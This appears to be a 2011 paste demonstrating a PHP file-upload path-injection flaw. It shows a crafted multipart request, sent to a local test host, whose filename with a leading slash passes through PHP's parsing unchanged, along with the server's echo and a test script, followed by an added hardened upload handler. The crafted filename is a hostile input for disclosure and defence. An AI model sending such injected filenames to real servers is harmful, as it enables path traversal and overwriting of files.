php.net file upload path injection

By: a guest on May 27th, 2011
HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200

------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain

any
------------ThIs_Is_tHe_bouNdaRY_$--

HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html

/anything.here.slash-will-pass

PHP script:
=====
<?php
if (!empty($_FILES['contents'])) {  // process file upload
    // print the filename exactly as PHP parsed it from Content-Disposition
    echo $_FILES['contents']['name'];
    // discard the uploaded temp file
    unlink($_FILES['contents']['tmp_name']);
}
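
Hardened handler (added example, not part of the original paste):
=====
For contrast with the script above, which echoes $_FILES['contents']['name'] with the leading slash intact, this handler never uses that value as a path. UPLOAD_DIR and safe_upload_name() are assumed names chosen for the illustration.

```php
<?php
// Added example: hardened counterpart to the paste's recv_dump.php.
// UPLOAD_DIR and safe_upload_name() are hypothetical names, not from the paste.
const UPLOAD_DIR = '/var/www/uploads';  // assumed: a directory where scripts are not executed

/**
 * Reduce a client-supplied filename to a safe leaf name, or return null.
 */
function safe_upload_name(string $clientName): ?string
{
    // Treat both separators as path separators, whatever the server OS.
    $leaf = basename(str_replace('\\', '/', $clientName));
    // Allow a conservative character set; anything else (NUL included) becomes "_".
    $leaf = (string) preg_replace('/[^A-Za-z0-9._-]/', '_', $leaf);
    // Reject empty names and dot-files such as ".", ".." or ".htaccess".
    if ($leaf === '' || $leaf[0] === '.') {
        return null;
    }
    return substr($leaf, 0, 100);
}

if (!empty($_FILES['contents']) && $_FILES['contents']['error'] === UPLOAD_ERR_OK) {
    $name = safe_upload_name($_FILES['contents']['name']);
    if ($name === null) {
        http_response_code(400);
        exit('rejected filename');
    }
    $target = UPLOAD_DIR . '/' . $name;
    // move_uploaded_file() refuses anything that is not a genuine upload temp file.
    if (!move_uploaded_file($_FILES['contents']['tmp_name'], $target)) {
        http_response_code(500);
        exit('store failed');
    }
    // Encode on output: the name is client-controlled text.
    echo htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}
```

With the request from the paste, safe_upload_name() returns "anything.here.slash-will-pass", so the stored path stays inside UPLOAD_DIR regardless of what the PHP version leaves in $_FILES.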